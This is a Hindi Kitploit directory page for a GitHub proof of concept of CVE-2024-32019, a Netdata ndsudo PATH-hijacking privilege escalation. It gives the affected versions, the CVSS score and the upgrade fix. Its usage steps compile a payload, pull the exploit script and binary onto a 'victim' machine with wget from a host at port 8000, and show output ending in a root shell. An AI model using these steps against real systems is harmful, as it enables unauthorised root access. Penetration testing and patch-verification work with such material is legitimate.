Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC — Netdata ndsudo विशेषाधिकार वृद्धि PoC | Kitploit
उपकरण/GitHubGitHub/t1erno/cve-2024-32019-netdata-ndsudo-privilege-escalation-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubt1erno/cve-2024-32019-netdata-ndsudo-privilege-escalation-poc

CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

Netdata ndsudo विशेषाधिकार वृद्धि PoC

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
311 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-32019 Netdata ndsudo विशेषाधिकार वृद्धि PoC

सारांश

CVE-2024-32019 Netdata के SUID हेल्पर ndsudo में एक स्थानीय विशेषाधिकार-वृद्धि दोष है, जो स्थानीय उपयोगकर्ता को अविश्वसनीय खोज पथ (PATH हाइजैकिंग) के माध्यम से रूट के रूप में मनमाने प्रोग्राम निष्पादित करने की अनुमति देता है।

यह समस्या इसलिए मौजूद है क्योंकि ndsudo कमांड नामों को प्रतिबंधित करता है, लेकिन उन्हें कॉलर के PATH का उपयोग करके हल करता है, जिससे उपयोगकर्ता एक दुर्भावनापूर्ण बाइनरी को PATH में पहले रख सकता है और ndsudo को उसे रूट विशेषाधिकारों के साथ चलाने दे सकता है।

यह Netdata Agent संस्करणों ≥ v1.45.0 और < v1.45.3, तथा ≥ v1.44.0-60 और < v1.45.0-169 को प्रभावित करता है, और इसका CVSS v3.1 स्कोर 8.8 (उच्च) है।

शमन उपाय v1.45.3 या v1.45.0-169 में अपग्रेड करना है; यह कमजोरी CWE-426 (अविश्वसनीय खोज पथ) से मेल खाती है।

उपयोग

  1. पेलोड संकलित करें या अपना खुद का तैयार करें
root@kitploit:~
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
  1. स्क्रिप्ट और पेलोड को पीड़ित मशीन पर अपलोड करें
root@kitploit:~
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01--  http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’

CVE-2024-32019.sh                                    100%[==================================================>]     712  --.-KB/s    in 0s

2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]

test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10--  http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’

nvme                                                 100%[==================================================>] 813.04K  1.98MB/s    in 0.4s

2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
  1. PoC निष्पादित करें
root@kitploit:~
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#

स्रोत:

  • https://www.rapid7.com/db/modules/exploit/linux/local/ndsudo_cve_2024_32019/
  • https://www.wiz.io/vulnerability-database/cve/cve-2024-32019
  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
टूल डाउनलोड करें